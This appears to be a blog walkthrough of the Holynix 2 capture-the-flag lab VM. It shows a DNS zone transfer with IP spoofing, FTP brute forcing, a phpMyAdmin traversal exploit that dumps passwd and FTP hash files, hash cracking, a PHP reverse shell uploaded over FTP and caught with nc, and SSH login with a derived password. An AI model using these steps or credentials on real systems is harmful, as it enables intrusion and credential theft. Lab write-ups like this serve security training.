NetHack: Holynix - 2 (to ssh shell)

root@kali:~# netdiscover -r 192.168.1.0/24

Currently scanning: Finished!   |   Screen View: Unique Hosts

1 Captured ARP Req/Rep packets, from 1 hosts.   Total size: 60
_____________________________________________________________________________
   IP            At MAC Address      Count Len   MAC Vendor
-----------------------------------------------------------------------------
192.168.1.88    00:0c:29:13:21:b3    01    060   VMware, Inc.

root@kali:~# ifconfig eth0 192.168.1.90 netmask 255.255.255.0
root@kali:~# ping 192.168.1.88
PING 192.168.1.88 (192.168.1.88) 56(84) bytes of data.
64 bytes from 192.168.1.88: icmp_req=1 ttl=64 time=0.843 ms
64 bytes from 192.168.1.88: icmp_req=2 ttl=64 time=0.431 ms

root@kali:~# unicornscan 192.168.1.88
TCP open                 ftp[   21]        from 192.168.1.88 ttl 64
TCP open                 ssh[   22]        from 192.168.1.88 ttl 64
TCP open              domain[   53]        from 192.168.1.88 ttl 64
TCP open                http[   80]        from 192.168.1.88 ttl 64

root@kali:~# nmap -sS -sV -O 192.168.1.88 -pT:21,22,53,80

Starting Nmap 6.40 ( http://nmap.org ) at 2013-11-11 09:14 CET
Nmap scan report for 192.168.1.88
Host is up (0.00043s latency).
PORT   STATE SERVICE VERSION
21/tcp open ftp     Pure-FTPd
22/tcp open ssh     OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
53/tcp open domain ISC BIND 9.4.2-P2.1
80/tcp open http    Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch)
MAC Address: 00:0C:29:13:21:B3 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6.22
OS details: Linux 2.6.22
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.47 seconds

http://192.168.1.88/

root@kali:~# dig @192.168.1.88 zincftp.com

; <<>> DiG 9.8.4-rpz2+rl005.12-P1 <<>> @192.168.1.88 zincftp.com
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- 52515="" br="" id:="" noerror="" opcode:="" query="" status:="">;; flags: qr aa rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 2, ADDITIONAL: 2

;; QUESTION SECTION:
;zincftp.com.            IN    A

;; ANSWER SECTION:
zincftp.com.        38400    IN    A    192.168.1.88

;; AUTHORITY SECTION:
zincftp.com.        38400    IN    NS    ns1.zincftp.com.
zincftp.com.        38400    IN    NS    ns2.zincftp.com.

;; ADDITIONAL SECTION:
ns1.zincftp.com.    38400    IN    A    192.168.1.88
ns2.zincftp.com.    38400    IN    A    192.168.1.89

;; Query time: 1 msec
;; SERVER: 192.168.1.88#53(192.168.1.88)
;; WHEN: Mon Nov 11 09:17:43 2013
;; MSG SIZE rcvd: 113

root@kali:~# dig -t axfr @192.168.1.88 zincftp.com

; <<>> DiG 9.8.4-rpz2+rl005.12-P1 <<>> -t axfr @192.168.1.88 zincftp.com
; (1 server found)
;; global options: +cmd
; Transfer failed.
root@kali:~# ifconfig eth0 192.168.1.89 netmask 255.255.255.0
root@kali:~# dig -t axfr @192.168.1.88 zincftp.com

; <<>> DiG 9.8.4-rpz2+rl005.12-P1 <<>> -t axfr @192.168.1.88 zincftp.com
; (1 server found)
;; global options: +cmd
zincftp.com.        38400    IN    SOA    ns1.zincftp.com. ns2.zincftp.com. 2006071801 28800 3600 604800 38400
zincftp.com.        38400    IN    NS    ns1.zincftp.com.
zincftp.com.        38400    IN    NS    ns2.zincftp.com.
zincftp.com.        38400    IN    MX    10 mta.zincftp.com.
zincftp.com.        38400    IN    A    192.168.1.88
ahuxley.zincftp.com.    38400    IN    A    192.168.1.88
amckinley.zincftp.com.    38400    IN    A    192.168.1.88
bzimmerman.zincftp.com.    38400    IN    A    192.168.1.88
cbergey.zincftp.com.    38400    IN    A    192.168.1.88
cfinnerly.zincftp.com.    38400    IN    A    192.168.1.88
cjalong.zincftp.com.    38400    IN    A    192.168.1.88
cmahong.zincftp.com.    38400    IN    A    192.168.1.88
cmanson.zincftp.com.    38400    IN    A    192.168.1.88
ddonnovan.zincftp.com.    38400    IN    A    192.168.1.88
ddypsky.zincftp.com.    38400    IN    A    192.168.1.88
dev.zincftp.com.    38400    IN    A    192.168.1.88
dhammond.zincftp.com.    38400    IN    A    192.168.1.88
dmoran.zincftp.com.    38400    IN    A    192.168.1.88
dsummers.zincftp.com.    38400    IN    A    192.168.1.88
evorhees.zincftp.com.    38400    IN    A    192.168.1.88
gwelch.zincftp.com.    38400    IN    A    192.168.1.88
hmcknight.zincftp.com.    38400    IN    A    192.168.1.88
jgacy.zincftp.com.    38400    IN    A    192.168.1.88
jsmith.zincftp.com.    38400    IN    A    192.168.1.88
jstreet.zincftp.com.    38400    IN    A    192.168.1.88
kmccallum.zincftp.com.    38400    IN    A    192.168.1.88
lnickerbacher.zincftp.com. 38400 IN    A    192.168.1.88
lsanderson.zincftp.com.    38400    IN    A    192.168.1.88
lwestre.zincftp.com.    38400    IN    A    192.168.1.88
mta.zincftp.com.    38400    IN    A    10.0.192.48
ncobol.zincftp.com.    38400    IN    A    192.168.1.88
ns1.zincftp.com.    38400    IN    A    192.168.1.88
ns2.zincftp.com.    38400    IN    A    192.168.1.89
rcropper.zincftp.com.    38400    IN    A    192.168.1.88
rfrost.zincftp.com.    38400    IN    A    192.168.1.88
rwoo.zincftp.com.    38400    IN    A    192.168.1.88
skrymple.zincftp.com.    38400    IN    A    192.168.1.88
splath.zincftp.com.    38400    IN    A    192.168.1.88
tmartin.zincftp.com.    38400    IN    A    192.168.1.88
trusted.zincftp.com.    38400    IN    A    192.168.1.34
www.zincftp.com.    38400    IN    A    192.168.1.88
zincftp.com.        38400    IN    SOA    ns1.zincftp.com. ns2.zincftp.com. 2006071801 28800 3600 604800 38400
;; Query time: 3 msec
;; SERVER: 192.168.1.88#53(192.168.1.88)
;; WHEN: Mon Nov 11 09:19:20 2013
;; XFR size: 42 records (messages 1, bytes 1021)

dig -t axfr @192.168.1.88 zincftp.com | grep 192.168.1.88 | awk '{print $1}' | sed 's/.zincftp\.com.//' > users.txt

dig -t axfr @192.168.1.88 zincftp.com | grep 192.168.1.88 | awk '{print $1}' > hosts.txt

pico /etc/hosts
192.168.1.88    ahuxley.zincftp.com
192.168.1.88    amckinley.zincftp.com
192.168.1.88    bzimmerman.zincftp.com
192.168.1.88    cbergey.zincftp.com
192.168.1.88    cfinnerly.zincftp.com
192.168.1.88    cjalong.zincftp.com
192.168.1.88    cmahong.zincftp.com
192.168.1.88    cmanson.zincftp.com
192.168.1.88    ddonnovan.zincftp.com
192.168.1.88    ddypsky.zincftp.com
192.168.1.88    dev.zincftp.com
192.168.1.88    dhammond.zincftp.com
192.168.1.88    dmoran.zincftp.com
192.168.1.88    dsummers.zincftp.com
192.168.1.88    evorhees.zincftp.com
192.168.1.88    gwelch.zincftp.com
192.168.1.88    hmcknight.zincftp.com
192.168.1.88    jgacy.zincftp.com
192.168.1.88    jsmith.zincftp.com
192.168.1.88    jstreet.zincftp.com
192.168.1.88    kmccallum.zincftp.com
192.168.1.88    lnickerbacher.zincftp.com
192.168.1.88    lsanderson.zincftp.com
192.168.1.88    lwestre.zincftp.com
192.168.1.88    ncobol.zincftp.com
192.168.1.88    ns1.zincftp.com
192.168.1.88    rcropper.zincftp.com
192.168.1.88    rfrost.zincftp.com
192.168.1.88    rwoo.zincftp.com
192.168.1.88    skrymple.zincftp.com
192.168.1.88    splath.zincftp.com
192.168.1.88    tmartin.zincftp.com
192.168.1.88    www.zincftp.com

root@kali:~# cat urls.txt
http://zincftp.com/
http://ahuxley.zincftp.com/
http://amckinley.zincftp.com/
http://bzimmerman.zincftp.com/
http://cbergey.zincftp.com/
http://cfinnerly.zincftp.com/
http://cjalong.zincftp.com/
http://cmahong.zincftp.com/
http://cmanson.zincftp.com/
http://ddonnovan.zincftp.com/
http//ddypsky.zincftp.com/
http://dev.zincftp.com/
http://dhammond.zincftp.com/
http://dmoran.zincftp.com/
http://dsummers.zincftp.com/
http://evorhees.zincftp.com/
http://gwelch.zincftp.com/
http://hmcknight.zincftp.com/
http://jgacy.zincftp.com/
http://jsmith.zincftp.com/
http://jstreet.zincftp.com/
http://kmccallum.zincftp.com/
http://lnickerbacher.zincftp.com/
http://lsanderson.zincftp.com/
http://lwestre.zincftp.com/
http://ncobol.zincftp.com/
http://ns1.zincftp.com/
http://rcropper.zincftp.com/
http://rfrost.zincftp.com/
http://rwoo.zincftp.com/
http://skrymple.zincftp.com/
http://splath.zincftp.com/
http://tmartin.zincftp.com/
http://www.zincftp.com/

geturls.sh
#!/bin/bash
        while IFS= read -r file
        do
                dirb "$file"
        done < "urls.txt"

./geturls.sh > dirbout.txt
...
root@kali:/usr/share/dirb# dirb http://ddonnovan.zincftp.com/
-----------------
DIRB v2.21
By The Dark Raver
-----------------

START_TIME: Mon Nov 11 10:09:56 2013
URL_BASE: http://ddonnovan.zincftp.com/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4592

---- Scanning URL: http://ddonnovan.zincftp.com/ ----
+ http://ddonnovan.zincftp.com/resume (CODE:200|SIZE:1256)
+ http://ddonnovan.zincftp.com/server-status (CODE:403|SIZE:342)

root@kali:/usr/share/dirb# dirb http://dev.zincftp.com/

-----------------
DIRB v2.21
By The Dark Raver
-----------------

START_TIME: Mon Nov 11 10:11:41 2013
URL_BASE: http://dev.zincftp.com/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4592

---- Scanning URL: http://dev.zincftp.com/ ----
+ http://dev.zincftp.com/index (CODE:200|SIZE:1205)
+ http://dev.zincftp.com/index.php (CODE:200|SIZE:1205)
+ http://dev.zincftp.com/phpMyAdmin (CODE:403|SIZE:333)
+ http://dev.zincftp.com/register (CODE:200|SIZE:16)
+ http://dev.zincftp.com/server-status (CODE:403|SIZE:336)

root@kali:~# medusa -h 192.168.1.88 -U users.txt -P /usr/share/wordlists/rockyou.txt -M ftp -t 1 -v 6 -e ns -g 5 -r 5
...

curl http://ddonnovan.zincftp.com/resume > resume.txt

ifconfig eth0 192.168.1.34 netmask 255.255.255.0

http://dev.zincftp.com/phpMyAdmin/

http://www.zincftp.com/phpMyAdmin/Documentation.html
phpMyAdmin 2.6.4-pl1 Documentation

searchsploit phpmyadmin

phpMyAdmin 2.6.4-pl1 Remote Directory Traversal Exploit                     /php/webapps/1244.pl

perl /usr/share/exploitdb/platforms/php/webapps/1244.pl http://www.zincftp.com /phpMyAdmin/ ../../../../../etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
dhcp:x:101:102::/nonexistent:/bin/false
syslog:x:102:103::/home/syslog:/bin/false
klog:x:103:104::/home/klog:/bin/false
bind:x:104:111::/var/cache/bind:/bin/false
sshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin
mysql:x:106:115:MySQL Server,,,:/var/lib/mysql:/bin/false
lsanderson:x:1000:114:Lyle Sanderson:/home/lsanderson:/bin/bash
cfinnerly:x:1001:100:Chuck Finnerly:/home/cfinnerly:/bin/bash
ddonnovan:x:1002:100:David Donnovan:/home/ddonnovan:/bin/bash
skrymple:x:1003:100:Shelly Krymple:/home/skrymple:/bin/bash
amckinley:x:1004:100:Agustin Mckinley:/home/amckinley:/bin/bash
cmahong:x:1005:2002::/home/cmahong:/bin/false
lnickerbacher:x:1006:2002::/home/lnickerbacher:/bin/false
jstreet:x:1007:2002::/home/jstreet:/bin/false
rwoo:x:1008:2002::/home/rwoo:/bin/false
kmccallum:x:1009:2002::/home/kmccallum:/bin/false
cjalong:x:1010:2002::/home/cjalong:/bin/false
jsmith:x:1011:2002::/home/jsmith:/bin/false
dhammond:x:1012:2002::/home/dhammond:/bin/false
hmcknight:x:1013:2002::/home/hmcknight:/bin/false
lwestre:x:1014:2002::/home/lwestre:/bin/false
gwelch:x:1015:2002::/home/gwelch:/bin/false
dmoran:x:1016:2002::/home/dmoran:/bin/false
dsummers:x:1017:2002::/home/dsummers:/bin/false
bzimmerman:x:1018:2002::/home/bzimmerman:/bin/false
ncobol:x:1019:2002::/home/ncobol:/bin/false
ddypsky:x:1020:2002::/home/ddypsky:/bin/false
rcropper:x:1021:2002::/home/rcropper:/bin/false
cbergey:x:1022:2002::/home/cbergey:/bin/false
tmartin:x:1023:2002::/home/tmartin:/bin/false
jgacy:x:1024:2002::/home/jgacy:/bin/false
splath:x:1025:2002::/home/splath:/bin/false
evorhees:x:1026:2002::/home/evorhees:/bin/false
rfrost:x:1027:2002::/home/rfrost:/bin/false
ahuxley:x:1028:2002::/home/ahuxley:/bin/false
webmaster:x:1029:2002::/var/www:/bin/false
cmanson:x:1030:2002::/home/cmanson:/bin/false
vftp:x:1031:2002:Virtual FTP User:/dev/null:/bin/false

root@kali:~# perl /usr/share/exploitdb/platforms/php/webapps/1244.pl http://www.zincftp.com /phpMyAdmin/ ../../../../../etc/pure-ftpd/pureftpd.passwd
cmahong:$1$vUW5q3t0$9RZSkReNoWGCaPtL7ixLX0:1031:2002::/home/cmahong/./::::::::::::
lnickerbacher:$1$yiEZKCE0$BOuvM8nrfoNGWAcjPenpa.:1031:2002::/home/lnickerbacher/./::::::::::::
jstreet:$1$sBGmOuB0$TPHx0jBSFjtJu7dJXb4Nw/:1031:2002::/home/jstreet/./::::::::::::
rwoo:$1$VZxDrE30$p7NPDTkxuQhPSsLpi2a1H1:1031:2002::/home/rwoo/./::::::::::::
cfinnerly:$1$dRGyIOy0$OVGBtLHyxFjPg7tmxtvHY/:1031:2002::/home/cfinnerly/./::::::::::::
kmccallum:$1$dijBzwn0$qlGcbcTT0Qyg8wQf4.QiG1:1031:2002::/home/kmccallum/./::::::::::::
cjalong:$1$FVj4if60$BWSIDiE97oTKUs70qOjZx/:1031:2002::/home/cjalong/./::::::::::::
jsmith:$1$yQKaOpR0$UdySwRtPd1upTckQ5/.CM/:1031:2002::/home/jsmith/./::::::::::::
lsanderson:$1$gzIP52U0$cL6XE61yDZD0unvIIkV8l/:1031:2002::/home/lsanderson/./::::::::::::
dhammond:$1$yK9OuzZ0$W7mgvS4SisxP1BwdLsuy1/:1031:2002::/home/dhammond/./::::::::::::
hmcknight:$1$A07SpdB0$hs/m8KyoJyY3gVAhlWDQI/:1031:2002::/home/hmcknight/./::::::::::::
lwestre:$1$.R5Dbl60$n2ajoJce/LnPVCq497sUQ.:1031:2002::/home/lwestre/./::::::::::::
gwelch:$1$/uYT22Y0$njR3vmLQrbnAugwkNLgJ5/:1031:2002::/home/gwelch/./::::::::::::
dmoran:$1$JZrJXdU0$ORe5.yRgQHCQl6h14rEEe.:1031:2002::/home/dmoran/./::::::::::::
dsummers:$1$VXo3pWp0$v0J7NsxRhDy/ufU01P/ch1:1031:2002::/home/dsummers/./::::::::::::
bzimmerman:$1$rQep6B90$ZtnoFZpTEBkNoRCfqJRpe/:1031:2002::/home/bzimmerman/./::::::::::::
amckinley:$1$45Bz0af0$Fsfo.XXcLkVzSaH5bLjzI0:1031:2002::/home/amckinley/./::::::::::::
ncobol:$1$q.xxgp70$645DFncdOFc24n93la5a70:1031:2002::/home/ncobol/./::::::::::::
ddypsky:$1$ccUhlpJ0$PO/WATKUekwaPct4zXeV9.:1031:2002::/home/ddypsky/./::::::::::::
rcropper:$1$Qhw2Vff0$QDvQMEe9CGFwVrvVUPqTz0:1031:2002::/home/rcropper/./::::::::::::
ddonnovan:$1$1z2APl80$uAyYFZLPu/WRkkpegD3Ht.:1031:2002::/home/ddonnovan/./::::::::::::
cbergey:$1$MOwY3Ie0$LcgARpcVk8Hf8n.E7itC40:1031:2002::/home/cbergey/./::::::::::::
tmartin:$1$3jpH7Yk0$2XmRv6acGEkBjmNQeyzUz.:1031:2002::/home/tmartin/./::::::::::::
jgacy:$1$b.0bYDi0$sSMXaRDSZu8YvWVz.wfCo0:1031:2002::/home/jgacy/./::::::::::::
splath:$1$jbdcsaj0$7uaXto3yRZWwDp5VEbJQV/:1031:2002::/home/splath/./::::::::::::
skrymple:$1$zjyNa1C0$x2JA4Tm61q3N0Fq06gXun1:1031:2002::/home/skrymple/./::::::::::::
evorhees:$1$ITHWZZd0$Qhs38Q7QpRTe./Npk25hu/:1031:2002::/home/evorhees/./::::::::::::
rfrost:$1$3Nqexaj0$eJv5nfOYM71jvlTEA1iv..:1031:2002::/home/rfrost/./::::::::::::
ahuxley:$1$ObpCAT60$LTqCcrqMGAgv8YMyva5Sr0:1031:2002::/home/ahuxley/./::::::::::::
cmanson:$1$gMHNCq70$RCOXC8pfElSRvh5BFc5fF0:1031:2002::/home/cmanson/./::::::::::::
webmaster:$1$v2tdHOX0$MnLOX4cXqZYL99QbDDZ/1/:1031:2002::/var/www/./::::::::::::

root@kali:~# john pass.txt --wordlist=/usr/share/wordlists/rockyou.txt
Loaded 31 password hashes with 31 different salts (FreeBSD MD5 [128/128 SSE2 intrinsics 12x])
millionaire      (tmartin)
chatterbox1      (cbergey)
bravenewworld    (ahuxley)
guesses: 3 time: 0:03:56:03 DONE (Mon Nov 11 16:31:46 2013) c/s: 28468 trying:      123d - *7¡Vamos!

root@kali:~# ftp 192.168.1.88
Connected to 192.168.1.88.
220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
220-You are user number 1 of 5 allowed.
220-Local time is now 03:39. Server port: 21.
220-This is a private system - No anonymous login
220-IPv6 connections are also welcome on this server.
220 You will be disconnected after 15 minutes of inactivity.
Name (192.168.1.88:root): tmartin
331 User tmartin OK. Password required
Password:
230-User tmartin has group access to: 2002
230 OK. Current directory is /
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
200 PORT command successful
150 Connecting to port 51201
-rw-r--r--    1 1031     2002         1004 Dec 6 2010 mystuff.rar
drwxr-xr-x    2 1031     2002         4096 Dec 5 2010 web
226-Options: -l
226 2 matches total
ftp> get mystuff.rar
local: mystuff.rar remote: mystuff.rar
200 PORT command successful
150 Connecting to port 60257
226-File successfully transferred
226 0.046 seconds (measured here), 21.22 Kbytes per second
1004 bytes received in 0.05 secs (21.0 kB/s)
ftp> quit
221-Goodbye. You uploaded 0 and downloaded 1 kbytes.
221 Logout.

unrar l mystuff.rar

UNRAR 4.10 freeware      Copyright (c) 1993-2012 Alexander Roshal

Archive mystuff.rar

Name             Size   Packed Ratio Date   Time     Attr      CRC   Meth Ver
-------------------------------------------------------------------------------
*Payroll.xls        80      128 160% 05-12-10 19:55 -rw-r--r-- 0D849616 m3b 2.9
*Contacts.txt      497      560 112% 05-12-10 19:53 -rw-r--r-- D095A304 m3b 2.9
*account_info.doc       80      128 160% 05-12-10 19:59 -rw-r--r-- 0D849616 m3b 2.9
-------------------------------------------------------------------------------
    3              657      816 124%

Ezt még nem sikerült feltörni...de folyamatban van...

root@kali:/var/www/phpshells# ftp 192.168.1.88
Connected to 192.168.1.88.
220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
220-You are user number 1 of 5 allowed.
220-Local time is now 04:30. Server port: 21.
220-This is a private system - No anonymous login
220-IPv6 connections are also welcome on this server.
220 You will be disconnected after 15 minutes of inactivity.
Name (192.168.1.88:root): tmartin
331 User tmartin OK. Password required
Password:
230-User tmartin has group access to: 2002
230 OK. Current directory is /
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> cd web
250 OK. Current directory is /web
ftp> put phpreverse.php
local: phpreverse.php remote: phpreverse.php
200 PORT command successful
150 Connecting to port 44363
226-File successfully transferred
226 0.001 seconds (measured here), 9.93 Mbytes per second
5494 bytes sent in 0.00 secs (31560.2 kB/s)
ftp> quit
221-Goodbye. You uploaded 6 and downloaded 0 kbytes.
221 Logout.
root@kali:/var/www/phpshells# nc -l -v -p 1234
listening on [any] 1234 ...

http://tmartin.zincftp.com/phpreverse.php

connect to [192.168.1.34] from ahuxley.zincftp.com [192.168.1.88] 55994
Linux holynix2 2.6.22-14-server #1 SMP Sun Oct 14 23:34:23 GMT 2007 i686 GNU/Linux
04:31:36 up 4:32, 0 users, load average: 0.00, 0.00, 0.00
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: can't access tty; job control turned off
$
$ ls /home
ahuxley
amckinley
bzimmerman
cbergey
cfinnerly
cjalong
cmahong
cmanson
ddonnovan
ddypsky
dhammond
dmoran
dsummers
evorhees
gwelch
hmcknight
jgacy
jsmith
jstreet
kmccallum
lnickerbacher
lsanderson
lwestre
ncobol
rcropper
rfrost
rwoo
skrymple
splath
tmartin

$ ls /home/amckinley
my_key.eml
web

$ cat /home/amckinley/my_key.eml
Delivered-To: amckinley@zincftp.com
Received: by 10.14.53.2 with SMTP id f2cs104681eec;
        Sun, 5 Dec 2010 19:20:58 -0800 (PST)
Received: by 10.229.81.74 with SMTP id w10mr4003536qck.75.1291605657402;
        Sun, 05 Dec 2010 19:20:57 -0800 (PST)
Return-Path:
Received: from mta.zincftp.com (mta.zincftp.com [10.0.192.48])
        by mta.zincftp.com with ESMTP id m12si9791432qck.133.2010.12.05.19.20.57;
        Sun, 05 Dec 2010 19:20:57 -0800 (PST)
Received-SPF: neutral (zincftp.com: 10.0.192.48 is neither permitted nor denied by best guess record for domain of lsanderson@zincftp.com) client-ip=10.0.192.48;
Authentication-Results: mta.zincftp.com; spf=neutral (zincftp.com: 10.0.192.48 is neither permitted nor denied by best guess record for domain of lsanderson@zincftp.com) smtp.mail=lsanderson@zincftp.com
Received: by mta.zincftp.com with SMTP id 5so10705863qwg.31
        for <amckinley@zincftp.com>; Sun, 05 Dec 2010 19:20:57 -0800 (PST)
MIME-Version: 1.0
Received: by 10.229.96.136 with SMTP id h8mr3946849qcn.184.1291605656745; Sun,
05 Dec 2010 19:20:56 -0800 (PST)
Received: by 10.229.67.90 with HTTP; Sun, 5 Dec 2010 19:20:56 -0800 (PST)
X-Originating-IP: [10.45.6.113]
Date: Sun, 5 Dec 2010 22:20:56 -0500
Message-ID:
Subject: RE: I forgot my ssh password
From: Lyle Sanderson <lsanderson@zincftp.com>
To: amckinley@zincftp.com
Content-Type: multipart/alternative; boundary=0016364edc1c5c38940496b56067

--0016364edc1c5c38940496b56067
Content-Type: text/plain; charset=ISO-8859-1

I can't retrieve your password only the hash, so I've reset it for you.
Your new password is your first and last name, all lower case, followed by 2ba9

You should change it when you log in.

$ ls /home/hmcknight
books.rar

$ ls /home/ncobol
blowfish.py
commonPorts

$ cat /home/ncobol/commonPorts
21 FTP (File Transfer Protocol)
22 SSH (Secure Shell)
23 Telnet
25 SMTP (Send Mail Transfer Protocol)
43 whois
53 DNS (Domain Name Service)
68 DHCP (Dynamic Host Control Protocol)
79 Finger
80 HTTP (HyperText Transfer Protocol)
110 POP3 (Post Office Protocol, version 3)
115 SFTP (Secure File Transfer Protocol)
119 NNTP (Network New Transfer Protocol)
123 NTP (Network Time Protocol)
137 NetBIOS-ns
138 NetBIOS-dgm
139 NetBIOS
143 IMAP (Internet Message Access Protocol)
161 SNMP (Simple Network Management Protocol)
194 IRC (Internet Relay Chat)
220 IMAP3 (Internet Message Access Protocol 3)
389 LDAP (Lightweight Directory Access Protocol)
443 SSL (Secure Socket Layer)
445 SMB (NetBIOS over TCP)
666 Doom
993 SIMAP (Secure Internet Message Access Protocol)
995 SPOP (Secure Post Office Protocol)

amckinley:x:1004:100:Agustin Mckinley:/home/amckinley:/bin/bash

password: agustinmckinley2ba9

root@kali:~# ssh amckinley@192.168.1.88
amckinley@192.168.1.88's password:
Linux holynix2 2.6.22-14-server #1 SMP Sun Oct 14 23:34:23 GMT 2007 i686

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
amckinley@holynix2:~$

Next phase: Privilege escalation.

NetHack

2013. november 11., hétfő

Holynix - 2 (to ssh shell)

Nincsenek megjegyzések:

Megjegyzés küldése